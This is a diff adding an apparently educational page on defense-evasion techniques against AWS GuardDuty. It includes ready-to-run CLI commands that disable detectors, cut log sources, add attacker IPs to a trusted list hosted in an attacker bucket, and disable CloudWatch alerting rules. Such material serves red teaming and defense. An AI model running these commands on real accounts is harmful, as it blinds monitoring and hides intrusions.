|
| 1 | +--- |
| 2 | +author: Ben Leembruggen |
| 3 | +title: Modify GuardDuty Configuration |
| 4 | +description: Modify existing GuardDuty configurations in the target account to hinder alerting and remediation capabilities. |
| 5 | +--- |
| 6 | + |
| 7 | +When an account has been successfully compromised, an attacker can modify threat detection services like GuardDuty to reduce the likelihood of their actions triggering an alert. Modifying, as opposed to outright deleting, key attributes of GuardDuty may be less likely to raise alerts, and result in a similar degradation of effectiveness. The actions available to an attacker will largely depend on the compromised permissions available to the attacker, the GuardDuty architecture and the presence of higher level controls like [Service Control Policies](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html). |
| 8 | + |
| 9 | +## GuardDuty |
| 10 | +Where GuardDuty uses a delegated admin or invite model, features like detector configurations and IP Trust lists are centrally managed, and so they can only be modified in the GuardDuty administrator account. Where this is not the case, these features can be modified in the account that GuardDuty is running in. |
| 11 | + |
| 12 | +--- |
| 13 | +### Misconfiguring the Detector |
| 14 | +An attacker could modify an existing GuardDuty detector in the account, to remove log sources or lessen its effectiveness. |
| 15 | + |
| 16 | +Configuration changes may include a combination of: |
| 17 | + |
| 18 | +- Disabling the detector altogether. |
| 19 | +- Removing Kubernetes and s3 as data sources, which removes all [S3 Protection](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-s3.html) and [Kubernetes alerts](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html). |
| 20 | +- Increasing the event update frequency to 6 hours, as opposed to as low as 15 minutes. |
| 21 | + |
| 22 | + |
| 23 | +#### Required Permissions to execute |
| 24 | +- guardduty:ListDetectors |
| 25 | +- guardduty:UpdateDetector |
| 26 | + |
| 27 | +Example CLI commands |
| 28 | +``` |
| 29 | +# Disabling the detector |
| 30 | +aws guardduty update-detector \ |
| 31 | + --detector-id 12abc34d567e8fa901bc2d34eexample \ |
| 32 | + --no-enable |
| 33 | +
|
| 34 | +# Removing s3 as a log source |
| 35 | +aws guardduty update-detector \ |
| 36 | + --detector-id 12abc34d567e8fa901bc2d34eexample \ |
| 37 | + --data-sources S3Logs={Enable=false} |
| 38 | +
|
| 39 | +# Increase finding update time to 6 hours |
| 40 | +aws guardduty update-detector \ |
| 41 | + --detector-id 12abc34d567e8fa901bc2d34eexample \ |
| 42 | + --finding-publishing-frequency SIX_HOURS |
| 43 | +``` |
| 44 | +--- |
| 45 | +### Modifying Trusted IP Lists |
| 46 | +An attacker could create or update GuardDuty's [Trusted IP list](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html), including their own IP on the list. Any IPs in a trusted IP list will not have any Cloudtrail or VPC flow log alerts raised against them. |
| 47 | + |
| 48 | +*DNS findings are exempt from the Trusted IP list.* |
| 49 | + |
| 50 | +#### Required Permissions to execute |
| 51 | +- guardduty:ListDetectors |
| 52 | +- guardduty:ListIPSet |
| 53 | +- iam:PutRolePolicy |
| 54 | +- guardduty:CreateIPSet (To create new list) |
| 55 | +- guardduty:UpdateIPSet (To update an existing list) |
| 56 | + |
| 57 | +*Depending on the level of stealth required, the file can be uploaded to an s3 bucket in the target account, or an account controlled by the attacker.* |
| 58 | + |
| 59 | + |
| 60 | +Example CLI commands |
| 61 | +``` |
| 62 | +aws guardduty update-ip-set \ |
| 63 | + --detector-id 12abc34d567e8fa901bc2d34eexample \ |
| 64 | + --ip-set-id 24adjigdk34290840348exampleiplist \ |
| 65 | + --location https://malicious-bucket.s3-us-east-1.amazonaws.com/customiplist.csv \ |
| 66 | + --activate |
| 67 | +``` |
| 68 | + |
| 69 | +--- |
| 70 | +### Modify Cloudwatch events rule |
| 71 | +GuardDuty populates its findings to Cloudwatch Events on a 5 minute cadence. Modifying the Event pattern or Targets for an event may reduce GuardDuty's ability to alert and trigger auto-remediation of findings, especially where the remediation is triggered in a member account as GuardDuty administrator protections do not extend to the Cloudwatch events in the member account. |
| 72 | + |
| 73 | +!!! Note |
| 74 | + In a delegated or invitational admin GuardDuty architecture, cloudwatch events will still be created in the admin account. |
| 75 | + |
| 76 | +#### Required Permissions to execute |
| 77 | +- event:ListRules |
| 78 | +- event:ListTargetsByRule |
| 79 | +- event:PutRule |
| 80 | +- event:RemoveTargets |
| 81 | + |
| 82 | +Example CLI commands |
| 83 | +``` |
| 84 | +# Disable GuardDuty Cloudwatch Event |
| 85 | +aws events put-rule --name guardduty-event \ |
| 86 | +--event-pattern "{\"source\":[\"aws.guardduty\"]}" \ |
| 87 | +--state DISABLED |
| 88 | +
|
| 89 | +# Modify Event Pattern |
| 90 | +aws events put-rule --name guardduty-event \ |
| 91 | +--event-pattern '{"source": ["aws.somethingthatdoesntexist"]}' |
| 92 | +
|
| 93 | +# Remove Event Targets |
| 94 | +aws events remove-targets --name guardduty-event \ |
| 95 | +--ids "GuardDutyTarget" |
| 96 | +``` |
0 commit comments